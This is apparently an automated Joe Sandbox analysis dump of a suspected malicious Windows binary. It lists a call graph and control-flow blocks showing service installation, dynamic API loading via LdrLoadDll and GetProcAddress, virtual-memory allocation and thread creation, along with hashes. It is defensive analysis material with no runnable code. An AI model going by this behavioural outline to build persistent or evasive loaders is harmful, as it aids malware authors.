__SehTransFilter 14094 140009cef FreeEnvironmentStringsW 14090->14094 14091 140009cd1 FreeEnvironmentStringsW 14091->14081 14095 140009de5 FreeEnvironmentStringsA 14092->14095 14096 140009d90 MultiByteToWideChar 14092->14096 14093->14081 14094->14081 14095->14081 14096->14092 14097 140009e0e 14096->14097 14098 140008de0 _lock 2 API calls 14097->14098 14099 140009e16 FreeEnvironmentStringsA 14098->14099 14099->14081 14102 140009a03 14100->14102 14101 140008300 _lock 17 API calls 14103 140009bca 14101->14103 14102->14101 14102->14103 14103->13999 14105 1400096b2 14104->14105 14106 1400096a8 14104->14106 14107 140008370 3 API calls 14105->14107 14106->14002 14115 1400096fa 14107->14115 14108 140009709 14108->14002 14109 1400097a5 14110 140008de0 _lock 2 API calls 14109->14110 14111 1400097b4 14110->14111 14111->14002 14112 140008370 3 API calls 14112->14115 14113 1400097e5 14114 140008de0 _lock 2 API calls 14113->14114 14114->14111 14115->14108 14115->14109 14115->14112 14115->14113 14119 140008666 14116->14119 14118 1400086bf 14118->14006 14119->14118 14204 140005380 14119->14204 14121 140001565 14120->14121 14122 140001569 14121->14122 14123 14000157e 14121->14123 14242 140001430 GetModuleFileNameW OpenSCManagerW 14122->14242 14126 140001595 OpenSCManagerW 14123->14126 14127 14000164f 14123->14127 14130 1400015b2 GetLastError 14126->14130 14131 1400015cf OpenServiceW 14126->14131 14128 140001654 14127->14128 14129 140001669 StartServiceCtrlDispatcherW 14127->14129 14251 1400011f0 14128->14251 14129->13973 14130->13973 14133 140001611 DeleteService 14131->14133 14134 1400015e9 GetLastError CloseServiceHandle 14131->14134 14135 140001626 CloseServiceHandle CloseServiceHandle 14133->14135 14136 14000161e GetLastError 14133->14136 14134->13973 14135->13973 14136->14135 14139 14000f01e _lock 14138->14139 14140 14000f03b LoadLibraryA 14139->14140 14141 14000f125 _lock 14139->14141 14142 14000f054 GetProcAddress 14140->14142 14143 1400094c9 14140->14143 14156 14000f165 14141->14156 14161 1400073e0 LdrLoadDll 14141->14161 14142->14143 14144 14000f06d _lock 14142->14144 14143->13969 14148 14000f075 GetProcAddress 14144->14148 14146 1400073e0 _lock LdrLoadDll 14146->14143 14147 1400073e0 _lock LdrLoadDll 14153 14000f1e9 14147->14153 14150 140007220 _lock 14148->14150 14152 14000f094 GetProcAddress 14150->14152 14151 1400073e0 _lock LdrLoadDll 14151->14156 14155 14000f0b3 _lock 14152->14155 14154 1400073e0 _lock LdrLoadDll 14153->14154 14157 14000f1a3 _lock 14153->14157 14154->14157 14155->14141 14158 14000f0e9 GetProcAddress 14155->14158 14156->14147 14156->14157 14157->14146 14159 14000f101 _lock 14158->14159 14159->14141 14160 14000f10d GetProcAddress 14159->14160 14160->14141 14162 140007333 14161->14162 14162->14161 14163 140007403 14162->14163 14163->14151 14165 1400083a0 14164->14165 14167 1400083be Sleep 14165->14167 14168 1400083e0 14165->14168 14175 14000e850 14165->14175 14167->14165 14167->14168 14168->14043 14170 1400073e0 _lock LdrLoadDll 14169->14170 14172 14000edec _lock 14170->14172 14171 14000ee1d _lock 14171->14044 14172->14171 14173 14000ee26 GetModuleHandleA 14172->14173 14173->14171 14174 14000ee38 GetProcAddress 14173->14174 14174->14171 14176 14000e865 14175->14176 14177 14000e876 sprintf_s 14176->14177 14178 14000e8be HeapAlloc 14176->14178 14180 1400090b0 14176->14180 14177->14165 14178->14176 14178->14177 14181 1400073e0 _lock LdrLoadDll 14180->14181 14182 1400090c5 14181->14182 14182->14176 14184 140008de9 HeapFree 14183->14184 14185 140008e19 _lock 14183->14185 14184->14185 14186 140008dff sprintf_s 14184->14186 14185->14069 14187 140008e09 GetLastError 14186->14187 14187->14185 14190 140008320 14188->14190 14191 140008358 14190->14191 14192 140008338 Sleep 14190->14192 14193 1400090f0 14190->14193 14191->14090 14191->14091 14192->14190 14192->14191 14194 140009103 14193->14194 14195 14000919e 14193->14195 14198 14000914c HeapAlloc 14194->14198 14199 140009540 _lock 12 API calls 14194->14199 14200 140009300 _lock 10 API calls 14194->14200 14201 1400090b0 _lock LdrLoadDll 14194->14201 14202 140008510 _lock 3 API calls 14194->14202 14203 140009173 sprintf_s 14194->14203 14196 1400090b0 _lock LdrLoadDll 14195->14196 14197 1400091a3 sprintf_s 14196->14197 14197->14190 14198->14194 14198->14203 14199->14194 14200->14194 14201->14194 14202->14194 14203->14190 14207 140005250 14204->14207 14206 140005389 14206->14118 14208 140005271 14207->14208 14209 1400073e0 _lock LdrLoadDll 14208->14209 14210 14000527e 14209->14210 14211 1400073e0 _lock LdrLoadDll 14210->14211 14212 14000528d 14211->14212 14216 1400052f0 _lock 14212->14216 14219 140008490 14212->14219 14214 1400052b5 14215 1400052d9 14214->14215 14214->14216 14222 140008400 14214->14222 14215->14216 14218 140008400 7 API calls 14215->14218 14216->14206 14218->14216 14220 1400084c5 HeapSize 14219->14220 14221 140008499 sprintf_s 14219->14221 14221->14214 14224 140008430 14222->14224 14225 140008472 14224->14225 14226 140008450 Sleep 14224->14226 14227 14000e920 14224->14227 14225->14215 14226->14224 14226->14225 14228 14000e935 14227->14228 14229 14000e94c 14228->14229 14238 14000e95e 14228->14238 14231 140008de0 _lock 2 API calls 14229->14231 14230 14000e9b1 14233 1400090b0 _lock LdrLoadDll 14230->14233 14234 14000e951 14231->14234 14232 14000e973 HeapReAlloc 14232->14238 14241 14000e9b9 _lock sprintf_s 14232->14241 14233->14241 14234->14224 14235 14000e9f4 sprintf_s 14237 14000e9f9 GetLastError 14235->14237 14236 1400090b0 _lock LdrLoadDll 14236->14238 14237->14241 14238->14230 14238->14232 14238->14235 14238->14236 14239 14000e9db sprintf_s 14238->14239 14240 14000e9e0 GetLastError 14239->14240 14240->14241 14241->14224 14243 140001482 CreateServiceW 14242->14243 14244 14000147a GetLastError 14242->14244 14246 1400014ea GetLastError 14243->14246 14247 1400014df CloseServiceHandle 14243->14247 14245 1400014fd 14244->14245 14257 140004f30 14245->14257 14248 1400014f2 CloseServiceHandle 14246->14248 14247->14248 14248->14245 14250 14000150d 14250->13973 14252 1400011fa 14251->14252 14266 1400051d0 14252->14266 14255 140004f30 sprintf_s NtAllocateVirtualMemory 14256 140001262 14255->14256 14256->13973 14259 140004f39 _SetImageBase 14257->14259 14258 140004f44 14258->14250 14259->14258 14262 140006c95 14259->14262 14261 14000660e sprintf_s 14261->14250 14264 140006d9d 14262->14264 14265 140006d7b 14262->14265 14263 140006f95 NtAllocateVirtualMemory 14263->14264 14264->14261 14265->14263 14265->14264 14269 140008270 14266->14269 14268 140001238 MessageBoxW 14268->14255 14270 14000827e 14269->14270 14272 1400082ac sprintf_s 14269->14272 14270->14272 14273 140008120 14270->14273 14272->14268 14274 14000816a 14273->14274 14275 14000813b sprintf_s 14273->14275 14274->14275 14277 1400081d7 14274->14277 14279 140007f50 14274->14279 14275->14272 14277->14275 14278 140007f50 sprintf_s 54 API calls 14277->14278 14278->14275 14288 140007f69 sprintf_s 14279->14288 14280 140007f74 sprintf_s 14280->14277 14281 14000801d 14282 1400080d5 14281->14282 14283 14000802f 14281->14283 14284 14000cc00 sprintf_s 54 API calls 14282->14284 14285 14000804c 14283->14285 14287 140008081 14283->14287 14290 140008056 14284->14290 14295 14000cc00 14285->14295 14287->14290 14303 14000c2a0 14287->14303 14288->14280 14288->14281 14292 14000cd50 14288->14292 14290->14277 14293 140008300 _lock 17 API calls 14292->14293 14294 14000cd6a 14293->14294 14294->14281 14296 14000cc3f 14295->14296 14298 14000cc23 sprintf_s 14295->14298 14296->14298 14311 14000fc50 14296->14311 14298->14290 14301 14000ccc5 sprintf_s 14356 14000fd20 LeaveCriticalSection 14301->14356 14304 14000c2e0 14303->14304 14310 14000c2c3 sprintf_s 14303->14310 14305 14000fc50 sprintf_s 25 API calls 14304->14305 14304->14310 14306 14000c34e 14305->14306 14307 14000c1f0 sprintf_s 2 API calls 14306->14307 14308 14000c367 sprintf_s 14306->14308 14307->14308 14390 14000fd20 LeaveCriticalSection 14308->14390 14310->14290 14312 14000fc96 14311->14312 14313 14000fccb 14311->14313 14357 14000b400 14312->14357 14315 14000ccac 14313->14315 14316 14000fccf EnterCriticalSection 14313->14316 14315->14301 14321 14000c3f0 14315->14321 14316->14315 14324 14000c42e 14321->14324 14327 14000c427 sprintf_s 14321->14327 14322 140004f30 sprintf_s NtAllocateVirtualMemory 14323 14000cbe6 14322->14323 14323->14301 14326 14000c4fb _SetImageBase sprintf_s 14324->14326 14324->14327 14384 14000c1f0 14324->14384 14331 14000c526 GetConsoleMode 14326->14331 14333 14000c841 14326->14333 14327->14322 14328 14000c86a 14330 14000c936 14328->14330 14335 14000c876 14328->14335 14329 14000cb20 WriteFile 14329->14327 14332 14000cb53 GetLastError 14329->14332 14339 14000c940 14330->14339 14346 14000ca02 14330->14346 14331->14333 14334 14000c557 14331->14334 14332->14327 14333->14328 14333->14329 14334->14333 14336 14000c564 GetConsoleCP 14334->14336 14335->14327 14337 14000c8c5 WriteFile 14335->14337 14336->14327 14350 14000c581 sprintf_s 14336->14350 14337->14335 14338 14000c928 GetLastError 14337->14338 14338->14327 14339->14327 14340 14000c991 WriteFile 14339->14340 14340->14339 14343 14000c9f4 GetLastError 14340->14343 14341 14000ca57 WideCharToMultiByte 14342 14000cb15 GetLastError 14341->14342 14341->14346 14342->14327 14343->14327 14344 14000cab0 WriteFile 14345 14000caf6 GetLastError 14344->14345 14344->14346 14345->14327 14345->14346 14346->14327 14346->14341 14346->14344 14347 14000c649 WideCharToMultiByte 14347->14327 14349 14000c68c WriteFile 14347->14349 14348 14000fd50 7 API calls sprintf_s 14348->14350 14349->14350 14351 14000c80d GetLastError 14349->14351 14350->14327 14350->14347 14350->14348 14352 14000c829 GetLastError 14350->14352 14353 14000c6e2 WriteFile 14350->14353 14355 14000c81b GetLastError 14350->14355 14351->14327 14352->14327 14353->14350 14354 14000c7ff GetLastError 14353->14354 14354->14327 14355->14327 14358 14000b41e 14357->14358 14359 14000b42f EnterCriticalSection 14357->14359 14363 14000b2f0 14358->14363 14361 14000b423 14361->14359 14362 1400084e0 _lock 12 API calls 14361->14362 14362->14359 14364 14000b317 14363->14364 14365 14000b32e 14363->14365 14366 140009540 _lock 12 API calls 14364->14366 14368 140008300 _lock 17 API calls 14365->14368 14372 14000b342 sprintf_s 14365->14372 14367 14000b31c 14366->14367 14369 140009300 _lock 10 API calls 14367->14369 14370 14000b350 14368->14370 14371 14000b324 14369->14371 14370->14372 14373 14000b400 _lock 22 API calls 14370->14373 14374 140008510 _lock GetModuleHandleA GetProcAddress ExitProcess 14371->14374 14372->14361 14375 14000b371 14373->14375 14374->14365 14376 14000b3a7 14375->14376 14377 14000b379 14375->14377 14379 140008de0 _lock HeapFree GetLastError 14376->14379 14378 14000edc0 _lock LdrLoadDll GetModuleHandleA GetProcAddress 14377->14378 14380 14000b386 14378->14380 14383 14000b392 sprintf_s 14379->14383 14382 140008de0 _lock HeapFree GetLastError 14380->14382 14380->14383 14381 14000b3b0 LeaveCriticalSection 14381->14372 14382->14383 14383->14381 14385 14000c20c sprintf_s 14384->14385 14386 14000c22c SetFilePointer 14385->14386 14388 14000c212 sprintf_s 14385->14388 14387 14000c24a GetLastError 14386->14387 14389 14000c254 sprintf_s 14386->14389 14387->14389 14388->14326 14389->14326 13956 140006c95 13958 140006d9d 13956->13958 13959 140006d7b 13956->13959 13957 140006f95 NtAllocateVirtualMemory 13957->13958 13959->13957 13959->13958 14391 1400054e0 14392 14000552c 14391->14392 14395 140005506 sprintf_s 14391->14395 14404 1400074d0 14392->14404 14396 140008370 3 API calls 14399 140005545 _SetImageBase 14396->14399 14397 1400055b8 14398 140008de0 _lock 2 API calls 14397->14398 14401 1400055c0 sprintf_s 14398->14401 14399->14397 14408 1400074f0 14399->14408 14401->14395 14403 1400055b0 GetLastError 14403->14397 14406 140007333 14404->14406 14405 140005536 14405->14396 14406->14405 14407 1400073e0 LdrLoadDll 14406->14407 14407->14406 14410 140007333 14408->14410 14409 140005561 CreateThread 14409->14401 14409->14403 14410->14409 14411 1400073e0 LdrLoadDll 14410->14411 14411->14410

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 131 140006c95-140006d75 132 1400075a3-1400075af 131->132 133 140006d7b-140006d9b 131->133 134 140006da2-140006dbc 133->134 135 140006d9d 133->135 136 140006dc3-140006ded 134->136 137 140006dbe 134->137 135->132 138 140006df4-140006e04 136->138 139 140006def 136->139 137->132 140 140006e06 138->140 141 140006e0b-140006e19 138->141 139->132 140->132 142 140006e1b 141->142 143 140006e20-140006e2f 141->143 142->132 144 140006e31 143->144 145 140006e36-140006e4e 143->145 144->132 146 140006e5a-140006e67 145->146 147 140006e69-140006e94 146->147 148 140006e9d-140006ed0 146->148 149 140006e96 147->149 150 140006e9b 147->150 151 140006edc-140006ee9 148->151 149->132 150->146 153 140006f89-140006f8e 151->153 154 140006eef-140006f23 151->154 155 140006f95-140006fd6 NtAllocateVirtualMemory 153->155 156 140006f90 153->156 157 140006f25-140006f2d 154->157 158 140006f2f-140006f33 154->158 155->132 159 140006fdc-140007020 155->159 156->132 160 140006f37-140006f7a 157->160 158->160 161 14000702c-140007037 159->161 162 140006f84 160->162 163 140006f7c-140006f80 160->163 165 140007039-140007058 161->165 166 14000705a-140007062 161->166 162->151 163->162 165->161 168 14000706e-14000707b 166->168 169 140007081-140007094 168->169 170 140007148-14000715e 168->170 173 140007096-1400070a9 169->173 174 1400070ab 169->174 171 1400072e2-1400072eb 170->171 172 140007164-14000717a 170->172 172->171 173->174 175 1400070ad-1400070db 173->175 176 140007064-14000706a 174->176 177 1400070ea-140007101 175->177 176->168 178 140007143 177->178 179 140007103-140007141 177->179 178->176 179->177
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$@
                                  • API String ID: 0-149943524
                                  • Opcode ID: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                  • Instruction ID: b9b90cad4d4dbad5e60228b5b2812afcd9ff4e9267d7912497f5da913a33a31e
                                  • Opcode Fuzzy Hash: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                  • Instruction Fuzzy Hash: 0EE19876619B84CADBA1CB19E4807AAB7A1F3C8795F105116FB8E87B68DB7CC454CF00

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 256 1400073e0-1400073e9 LdrLoadDll 257 1400073f8-140007401 256->257 258 140007403 257->258 259 140007408-14000742e 257->259 260 1400075a3-1400075af 258->260 262 140007435-140007462 259->262 263 140007430 259->263 265 140007464-14000747e 262->265 266 1400074b6-1400074e9 262->266 264 140007559-140007567 263->264 274 140007341-1400073de 264->274 275 14000756c-1400075a2 264->275 270 1400074b4 265->270 271 140007480-1400074b3 265->271 267 1400074eb-14000752b 266->267 268 14000752c-140007535 266->268 267->268 272 140007552 268->272 273 140007537-140007554 268->273 270->268 271->270 272->260 273->264 274->256 275->260
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                  • Instruction ID: 9a2124daaedac402c784edcfb7064d0c1467828d98a6eaf5875e1b487be58861
                                  • Opcode Fuzzy Hash: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                  • Instruction Fuzzy Hash: 2451A676619BC582DA71CB1AE4907EEA360F7C8B85F504026EB8E87B69DF3DC455CB00

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: File$CreateReadmalloc
                                  • String ID: .$.$L$M$M$a$a$c$c$d$d$i$l$l$l$l$m$m$o$p$r$s$s$s$t$t$t$v
                                  • API String ID: 3950102678-3381721293
                                  • Opcode ID: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                  • Instruction ID: 29f707ba186f29322d2427d6251999ac740dd2877dad0e4ee3b4d54c0b8fffc7
                                  • Opcode Fuzzy Hash: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                  • Instruction Fuzzy Hash: 0241A03250C7C0C9E372C729E45879BBB91E3A6748F04405997C846B9ACBBED158CB22

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 25 7ffdac091c00-7ffdac091c06 26 7ffdac091c08-7ffdac091c0b 25->26 27 7ffdac091c41-7ffdac091c4b 25->27 29 7ffdac091c35-7ffdac091c74 call 7ffdac092470 26->29 30 7ffdac091c0d-7ffdac091c10 26->30 28 7ffdac091d68-7ffdac091d7d 27->28 34 7ffdac091d8c-7ffdac091da6 call 7ffdac092304 28->34 35 7ffdac091d7f 28->35 48 7ffdac091c7a-7ffdac091c8f call 7ffdac092304 29->48 49 7ffdac091d42 29->49 32 7ffdac091c28 __scrt_dllmain_crt_thread_attach 30->32 33 7ffdac091c12-7ffdac091c15 30->33 37 7ffdac091c2d-7ffdac091c34 32->37 39 7ffdac091c17-7ffdac091c20 33->39 40 7ffdac091c21-7ffdac091c26 call 7ffdac0923b4 33->40 46 7ffdac091da8-7ffdac091dd9 call 7ffdac09242c call 7ffdac0922d4 call 7ffdac0927b4 call 7ffdac0925d0 call 7ffdac0925f4 call 7ffdac09245c 34->46 47 7ffdac091ddb-7ffdac091e0c call 7ffdac092630 34->47 41 7ffdac091d81-7ffdac091d8b 35->41 40->37 46->41 57 7ffdac091e1d-7ffdac091e23 47->57 58 7ffdac091e0e-7ffdac091e14 47->58 60 7ffdac091c95-7ffdac091ca6 call 7ffdac092374 48->60 61 7ffdac091d5a-7ffdac091d67 call 7ffdac092630 48->61 52 7ffdac091d44-7ffdac091d59 49->52 63 7ffdac091e65-7ffdac091e6d call 7ffdac091720 57->63 64 7ffdac091e25-7ffdac091e2f 57->64 58->57 62 7ffdac091e16-7ffdac091e18 58->62 78 7ffdac091cf7-7ffdac091d01 call 7ffdac0925d0 60->78 79 7ffdac091ca8-7ffdac091ccc call 7ffdac092778 call 7ffdac0922c4 call 7ffdac0922e8 call 7ffdac097b10 60->79 61->28 68 7ffdac091f02-7ffdac091f0f 62->68 75 7ffdac091e72-7ffdac091e7b 63->75 69 7ffdac091e36-7ffdac091e3c 64->69 70 7ffdac091e31-7ffdac091e34 64->70 76 7ffdac091e3e-7ffdac091e44 69->76 70->76 80 7ffdac091e7d-7ffdac091e7f 75->80 81 7ffdac091eb3-7ffdac091eb5 75->81 84 7ffdac091ef8-7ffdac091f00 76->84 85 7ffdac091e4a-7ffdac091e5f call 7ffdac091c00 76->85 78->49 101 7ffdac091d03-7ffdac091d0f call 7ffdac092620 78->101 79->78 127 7ffdac091cce-7ffdac091cd5 __scrt_dllmain_after_initialize_c 79->127 80->81 89 7ffdac091e81-7ffdac091ea3 call 7ffdac091720 call 7ffdac091d68 80->89 91 7ffdac091eb7-7ffdac091eba 81->91 92 7ffdac091ebc-7ffdac091ed1 call 7ffdac091c00 81->92 84->68 85->63 85->84 89->81 122 7ffdac091ea5-7ffdac091eaa 89->122 91->84 91->92 92->84 111 7ffdac091ed3-7ffdac091edd 92->111 112 7ffdac091d35-7ffdac091d40 101->112 113 7ffdac091d11-7ffdac091d1b call 7ffdac092538 101->113 117 7ffdac091edf-7ffdac091ee2 111->117 118 7ffdac091ee4-7ffdac091ef2 111->118 112->52 113->112 126 7ffdac091d1d-7ffdac091d2b 113->126 119 7ffdac091ef4 117->119 118->119 119->84 122->81 126->112 127->78 128 7ffdac091cd7-7ffdac091cf4 call 7ffdac097acc 127->128 128->78
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3129059889.00007FFDAC091000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC090000, based on PE: true
                                  • Associated: 00000005.00000002.3129046543.00007FFDAC090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129077200.00007FFDAC0A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129100003.00007FFDAC0AD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129117053.00007FFDAC0AF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffdac090000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                  • String ID:
                                  • API String ID: 190073905-0
                                  • Opcode ID: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                  • Instruction ID: 8bb7e58d2b79eabed7df5b406eee5224a5b503583e708b9ad3ec7bd16de5b8e1
                                  • Opcode Fuzzy Hash: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                  • Instruction Fuzzy Hash: 7681BF61F0F2438AFA549B2694713B92290AF657E0F048435EA0D577A3DF3CE976A70C

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3129059889.00007FFDAC091000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC090000, based on PE: true
                                  • Associated: 00000005.00000002.3129046543.00007FFDAC090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129077200.00007FFDAC0A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129100003.00007FFDAC0AD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129117053.00007FFDAC0AF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffdac090000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: Concurrency::cancel_current_taskFree$ConsoleFileFindFirstLibrary
                                  • String ID: WordpadFilter.db
                                  • API String ID: 868324331-3647581008
                                  • Opcode ID: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                  • Instruction ID: cc12b465df8363399726ecdaf30369342c42db310bda793ca049550b37182e55
                                  • Opcode Fuzzy Hash: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                  • Instruction Fuzzy Hash: 4C317C32B16B4189E700CBB1D8607AD73A5EB99798F144635EE4D13B46EF38D161C748

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 196 7ffdac0911b0-7ffdac091207 197 7ffdac091209-7ffdac091222 call 7ffdac0a1490 196->197 198 7ffdac09124b-7ffdac09124e 196->198 210 7ffdac09123e 197->210 211 7ffdac091224-7ffdac091227 197->211 199 7ffdac0914b8-7ffdac0914bf 198->199 200 7ffdac091254-7ffdac091280 198->200 204 7ffdac0914c3-7ffdac0914ea call 7ffdac091b70 199->204 202 7ffdac0912f6-7ffdac091335 call 7ffdac091b90 call 7ffdac0a0a50 200->202 203 7ffdac091282-7ffdac09128f 200->203 232 7ffdac091340-7ffdac0913cb 202->232 207 7ffdac091295-7ffdac09129c 203->207 208 7ffdac0914f1-7ffdac0914f6 call 7ffdac091a40 203->208 216 7ffdac0912c7-7ffdac0912cf call 7ffdac091b90 207->216 217 7ffdac09129e-7ffdac0912a5 207->217 222 7ffdac0914f7-7ffdac0914ff call 7ffdac091110 208->222 213 7ffdac091241-7ffdac091246 210->213 212 7ffdac091229-7ffdac09123c call 7ffdac0a1490 211->212 211->213 212->210 212->211 213->198 230 7ffdac0912d2-7ffdac0912f1 call 7ffdac0a0e10 216->230 217->222 223 7ffdac0912ab-7ffdac0912b3 call 7ffdac091b90 217->223 236 7ffdac0912b9-7ffdac0912c5 223->236 237 7ffdac0914eb-7ffdac0914f0 call 7ffdac0979cc 223->237 230->202 232->232 235 7ffdac0913d1-7ffdac0913da 232->235 239 7ffdac0913e0-7ffdac091402 235->239 236->230 237->208 242 7ffdac091411-7ffdac09142c 239->242 243 7ffdac091404-7ffdac09140e 239->243 242->239 244 7ffdac09142e-7ffdac091436 242->244 243->242 245 7ffdac091498-7ffdac0914a6 244->245 246 7ffdac091438-7ffdac09143b 244->246 248 7ffdac0914b6 245->248 249 7ffdac0914a8-7ffdac0914b5 call 7ffdac091bcc 245->249 247 7ffdac091440-7ffdac091449 246->247 250 7ffdac091455-7ffdac091465 247->250 251 7ffdac09144b-7ffdac091453 247->251 248->204 249->248 253 7ffdac091467-7ffdac09146e 250->253 254 7ffdac091470-7ffdac091496 250->254 251->250 253->254 254->245 254->247
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3129059889.00007FFDAC091000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC090000, based on PE: true
                                  • Associated: 00000005.00000002.3129046543.00007FFDAC090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129077200.00007FFDAC0A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129100003.00007FFDAC0AD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000005.00000002.3129117053.00007FFDAC0AF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffdac090000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                  • String ID:
                                  • API String ID: 73155330-0
                                  • Opcode ID: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                  • Instruction ID: 39866cda79b322d4306ff78e678e7bec92c7137e679cc96de2029d814fea5701
                                  • Opcode Fuzzy Hash: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                  • Instruction Fuzzy Hash: E3814E23B1A78245E6118B3598102B9A694FF66BD4F148335EF5957793DF3CE0A2930C
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128933420.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3128946359.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000005.00000002.3129030715.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_140000000_XXiUpO.jbxd
                                  Similarity
                                  • API ID: CriticalSection$EnterLeave$Heap$AllocProcesslstrlen
                                  • String ID:
                                  • API String ID: 3526400053-0
                                  • Opcode ID: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                  • Instruction ID: dcb8fc7c666fd7128fde866f0540a8def7dae1288ec2bbf322971b46f3f62141
                                  • Opcode Fuzzy Hash: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                  • Instruction Fuzzy Hash: E3220F76211B4086E722DF26F840B9933A1F78CBE5F541226EB5A8B7B4DF3AC585C740
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.3128916724.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000005.00000002.3128819805.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
